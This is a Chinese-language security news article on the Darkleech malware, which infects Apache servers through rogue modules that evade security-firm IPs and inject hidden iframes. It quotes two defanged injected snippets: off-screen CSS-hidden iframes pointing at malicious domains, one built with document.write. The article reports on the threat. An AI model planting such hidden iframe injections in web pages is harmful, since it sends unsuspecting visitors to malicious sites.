恶意软件Darkleech大肆感染Apache服务器

假设每台服务器十个站点的话，至少有20000个网站被感染，其中包括知名网站如《洛杉矶时报》。

Darkleech主要使用了Apache的模块注入iframe到受害站点中，模块名称如mod_spm_headers.so 或 mod_spm_mem.so，该模块主要功能如下：

1：过滤来自搜索引擎和安全公司的IP地址 2：过滤User-Agent是robot、自动化工具（如Curl, Indy Library等），以及一些IPHONE手机移动客户端等 3：过滤黑名单IP 4：最为复杂的一点，当确认该IP是自然流量之后，该模块会创建一个保持5分钟的session给该IP，然后请求一个js地址，如果用户在该页面浏览了js，那在接下来的7天里不会重复该动作。 5：嵌入恶意的iframe，见下。、

该模块可能在每台服务器上名称不同，当用户访问目标站网站的时候会被连接到恶意的站点。如下代码：

<style>.tlqvepxi { position:absolute; left:-1648px; top:-1752px} </style> <div class="tlqvepxi">

<iframe src="hxxp://matisere .com/21234443.html" width="581" height="476"></iframe></div>

以及 document.write('<style>.hmfabv9 { position:absolute; left:-1141px; top:-1518px} </style> <div class="hmfabv9"> <iframe src="hxxp://sepatch .org/35204443.html" width="122" height="202"></iframe></div>');

所有的数字和style的名称都是随机生成，并且每天数次同步感染受害者的服务器，检查iframe是否存在。

因为网站的其他源码没有变化，所以管理员及时发现被嵌入了iframe，但是很难检测到问题出在哪里。

并且如果来自安全公司和托管公司的IP地址访问了被感染的网站，它不会在终端用户展示的网页中嵌入恶意链接。

目前还不清楚攻击者利用了什么弱点入侵Apache机器，安全研究人员怀疑漏洞可能存在于用于管理网站的软件如Plesk和Cpanel中，也不排除密码破解和社会工程等攻击方法的可能性。